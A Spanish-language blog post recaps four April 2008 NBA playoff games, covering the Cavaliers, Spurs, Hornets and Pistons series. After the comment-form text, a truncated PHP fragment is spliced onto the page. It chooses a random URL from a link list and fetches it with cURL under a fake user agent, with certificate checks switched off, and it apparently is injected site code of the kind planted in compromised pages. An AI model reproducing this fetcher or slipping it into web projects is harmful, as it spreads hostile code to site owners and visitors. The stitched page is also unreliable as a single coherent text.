Más que un rey para postrar a los Wizards

28 de April de 2008 por TheDeerHunter

Más que un rey para postrar a los Wizards (CLE 100 – WAS 97)

The King y sus Cavaliers sufrieron pero lograron recuperar la iniciativa en su eliminatoria pero lo consiguieron gracias a un postrero triple de Delonte West a 5 segundos del final a pase de Lebron que desequilibró definitivamente la balanza. El posterior intento de Gilbert Arenas no fructificó y ahora las cosas se les ponen muy difíciles a Washington para lograr la sorpresa.

En esta ocasión, Lebron tuvo la ayuda de dos de sus “caballeros”, West y Gibson, que realizaron un partido muy eficaz aprovechando bien los huecos que producía “El Elegido” en sus constantes penetraciones. El resto del equipo, como ya empieza a ser habitual, no aportó gran cosa ofensivamente, pero volvieron a destrozar a Washington en el rebote por octava ocasión consecutiva en esta temporada.

Washington peleó por el partido con todo lo que pudo. En ocasiones, como durante toda la eliminatoria con alguna que otra artimaña más allá de lo que se puede o de lo que se debe. Jamison, Butler y Haywood hicieron un gran partido y todos los titulares alcanzaron dobles figuras pero no fue suficiente.

Lebron tiene en el próximo partido en casa la oportunidad de cerrar la eliminatoria más pronto de lo que se suponía y de paso alcanzará un escalón más de consideración demostrando su casi sobrehumana dureza mental y física y un alto nivel de conocimiento del juego, aspecto sobre el que es y será examinado con lupa constantemente. Creemos que no tendrá excesivos problemas para lograrlo.

En la búsqueda de un milagro, o varios (SAS 86 – PHO 105)

No nos engañemos, nadie en su sano juicio apostaría porque ningún equipo le pueda ganar a los Spurs cuatro partidos seguidos en una serie de play-offs cuando estos dominan por 3 a 0. Quizá es lo que les ha servido a los Suns para recuperarse del mazazo del primer partido que les ha arrastrado a la derrota en los siguientes. Ahora ya nadie espera nada de ellos. Eso, y un mal partido de los Spurs que, como es habitual, les ha podido costar mantener la motivación el ser conscienten que lo tienen prácticamente hecho. La lectura de este tipo de partidos siempre es complicada, pues depende mucho del estado anímico de unos y de otros y pocas conclusiones reales se pueden sacar.

Phoenix se reinventó a si mismo volviendo el partido loco con mucha velocidad de ejecución huyendo del juego estático que les ha llevado al fracaso. Es curioso que hayan tenido que dar tantas vueltas para llegar al mismo sitio pero lo que parece claro es que a tratar de controlar los partidos no van a superar a los actuales campeones. Se la van a tener que jugar a cara o cruz y de momento les ha salido cara. Como primera consecuencia, el juego exterior de los Suns participó mucho más del juego en ataque y curiosamente también se implicó mucho más en la defensa. De esta manera ya no fue tan fácil ahogar a Nash como en los dos últimos partidos y en general ya no fue tan sencillo defenderlos, quedando demostrado que la mayoría de jugadores (Barbosa, Bell, Diaw) necesitan este tipo de juego para rendir en este equipo. Por último, durante la primera parte pudieron disfrutar de un Shaq que recordó al de antaño. Incluso mostró su increíble habilidad para meter los tiros libres cuando le hacían el ya famoso “cazar a Shaq”.

A pesar del buen partido de ayer, todo indica que Spurs cerrará la eliminatoria en el próximo partido en casa A Suns sólo le queda esperar un milagro para ese partido. Sii lo logra ya se podrán plantear próximos milagros.

El solar de Dirk (NOH 97 – DAL 84)

Cuando Nowitzki volvió en el último tramo de la temporada, forzando con una lesión nada menos que de rodilla, para salvar a estos Mavericks de quedar eliminados a la lucha por el título suponemos que fue porque todavía creía en este proyecto y porque todavía creía que Jason Kidd podría llevarle otra vez hasta la final. No sabemos si Jason Kidd pensaba lo mismo o si ya tenía claro que no estaba en condiciones de aspirar a nada y a mucho menos incluso si se encontraba enfrente con una versión de base mejorada y digipotenciada para sacarle de la pista. Supongo que cuando llegó a nuestros oídos que todo el equipo de Spurs celebró en el vestuario el arriesgado trade de Kuban debereríamos haber imaginado la respuesta, pero aún así, teniendo en cuenta los jugadores con los que puede contar todos los días Avery Johnson era difícil imaginar el descalabro y la imagen de impotencia que una vez más nos ha transmitido este equipo.

Nunca hay que dar por enterrado a ningún equipo en el que juegue Nowitzki pero todo indica que finalmente se confirmará el fracaso de otro espectacular proyecto y el declive de otro de los grandes atractivos de esta liga. Quién los ha visto y quién los ve.

A reyes muertos, reyes puestos. Larga vida a los Hornets.

Un toque de genialidad (DET 93 – PHI 84)

Dicen que a veces un toque de genialidad es más que necesario para cambiar el desarrollo de los acontecimientos. Ayer, cuando todo parecía abocado al fracaso para los experimentados Detroit, cuando las dudas se volvían a cernir sobre ellos, cuando contemplaban aturdidos como un grupo de casi-imberbes les volvían a poner contra las cuerdas, sucedió. 12 minutos de genialidad. En esos 12 minutos los Pistons anotaron 34 puntos, apretaron los dientes en defensa y la diferencia de 10 puntos a favor de los Sixers desapareció de un plumazo, convirtiéndose en 8 puntos a su favor. Philadelphia continuó luchando en el cuarto pero a los Pistons es muy difícil que se le escape un partido como este.

Esta siendo sin duda la serie más igualada y más bonita de la primera ronda de los Playoffs y también la que más oportunidades tiene de llevarnos al séptimo partido. ¡Qué momento será ese!¡Brindo por ello!

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>